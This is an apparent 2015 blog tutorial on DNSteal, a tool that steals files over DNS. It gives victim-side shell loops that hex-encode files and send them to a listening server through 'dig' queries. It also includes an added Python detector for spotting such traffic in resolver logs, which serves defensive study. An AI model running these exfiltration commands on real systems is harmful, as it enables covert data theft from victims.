Saturday, October 3, 2015

How To Send Files Stealthily To A Remote Machine Using "DNSteal"

Data exfiltration is sometimes referred to as data extrusion, data exportation, or data theft. All of these terms are used to describe the unauthorized transfer of data from a computer or other device.

Data exfiltration can be conducted manually, by an individual with physical access to a computer, but it can also be an automated process conducted through malicious programming over a network.

Generally, data exfiltration is a form of security breach that occurs when data is downloaded from or uploaded to a computer or server without authorization. These attacks are primarily intended to gain access to the data held on a network or machine.

Data exfiltration can be carried out using various methods, such as installing remote-access applications, using removable media devices, social engineering techniques, or phishing emails.
A newer data exfiltration tool named "DNSteal" has been released which is programmed to send files to a remote machine via DNS requests.

DNSteal is a data exfiltration tool that stealthily sends files over DNS requests. Once installed and run, it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests: the file is hex-encoded, split into chunks, and each chunk is sent as the leftmost label of a DNS query that the fake server receives and reassembles.

Dnsteal code is available on GitHub.

Here is an example of how to use this tool.

Usage:

On the victim machine, you simply send the following command:


for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done


Support for multiple files:


for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done



It also supports gzip compression of the file to allow for faster transfer speeds. This is enabled on the server side with the "-z" switch:

python dnsteal.py 127.0.0.1 -z


Then, on the victim machine, send a gzipped file like so:

for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done


or for multiple gzip-compressed files:

for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
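The loops above leave a very recognisable footprint in resolver logs: a burst of queries from one client, all under the same zone, each carrying a 60-character lowercase hex label (xxd -p emits 30 bytes per line) as the leftmost label. The following detector, an added defensive example that is not part of the original post or the DNSteal project, scores (client, zone) pairs on exactly those traits over a constructed log sample. The "timestamp client qname qtype" log layout, the thresholds and the sample payload are assumptions; adapt parse_log() to your resolver's real format.

```python
import math
import re
from collections import defaultdict

HEX_LABEL = re.compile(r"^[0-9a-f]+$")


def _constructed_exfil_lines(client="10.0.0.7", zone="secret.png.com", nlines=5):
    # Builds log lines shaped like what a resolver records for the "xxd -p | dig"
    # loop: a 60-character (30-byte) hex chunk as the leftmost label.
    # The payload is constructed filler (bytes 0x00..0xff), not a real file.
    hexdata = bytes(range(256)).hex()
    lines = []
    for i in range(nlines):
        chunk = hexdata[i * 60:(i + 1) * 60]
        lines.append(f"2015-10-03T10:00:0{i} {client} {chunk}.{zone} A")
    return lines


# Constructed sample log in an assumed "timestamp client qname qtype" layout:
# a few ordinary lookups from one host, then a hex-chunk burst from another.
SAMPLE_LOG = "\n".join([
    "2015-10-03T10:00:00 10.0.0.5 www.example.org A",
    "2015-10-03T10:00:01 10.0.0.5 mail.example.org MX",
    "2015-10-03T10:00:02 10.0.0.5 cdn-1234.static.example.net A",
    "2015-10-03T10:00:05 10.0.0.5 api.example.org AAAA",
    "2015-10-03T10:00:06 10.0.0.5 img.example.org A",
] + _constructed_exfil_lines())


def parse_log(text):
    """Parse log lines into (timestamp, client, qname, qtype) tuples, skipping malformed ones."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, qtype = parts
        records.append((ts, client, qname.lower().rstrip("."), qtype))
    return records


def shannon_entropy(s):
    """Bits of entropy per character; hex-encoded data sits near 4.0, hostnames far lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def detect_dns_exfil(records, min_queries=4, min_label_len=32, min_hex_ratio=0.8):
    """Flag (client, zone) pairs whose leftmost labels look like hex-encoded file chunks.

    Heuristics: many queries under one zone, long leftmost labels made only of hex
    digits, and high entropy across those labels. The thresholds are assumed defaults.
    """
    groups = defaultdict(list)
    for _ts, client, qname, _qtype in records:
        labels = qname.split(".")
        if len(labels) < 3:  # need at least one label beneath a two-label zone
            continue
        zone = ".".join(labels[-2:])
        groups[(client, zone)].append(labels[0])

    findings = []
    for (client, zone), first_labels in groups.items():
        if len(first_labels) < min_queries:
            continue
        hex_like = [lab for lab in first_labels
                    if len(lab) >= min_label_len and HEX_LABEL.match(lab)]
        ratio = len(hex_like) / len(first_labels)
        if ratio < min_hex_ratio:
            continue
        findings.append({
            "client": client,
            "zone": zone,
            "queries": len(first_labels),
            "hex_ratio": round(ratio, 2),
            "entropy": round(shannon_entropy("".join(hex_like)), 2),
            # each hex pair is one byte: a lower bound on what may have left the network
            "approx_bytes": sum(len(lab) // 2 for lab in hex_like),
        })
    return findings


if __name__ == "__main__":
    for f in detect_dns_exfil(parse_log(SAMPLE_LOG)):
        print(f"suspicious: {f['client']} -> *.{f['zone']} "
              f"({f['queries']} queries, ~{f['approx_bytes']} bytes, entropy {f['entropy']})")
```

Grouping by the last two labels is deliberate: the file name itself sits between the hex chunk and the zone, so keying on the full parent domain would split one transfer into one group per file. The approx_bytes figure is useful in incident response as an estimate of how much data reached the attacker's resolver; with the "-z" option the chunks are gzip output rather than raw file bytes, so the real loss is larger than the count suggests.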
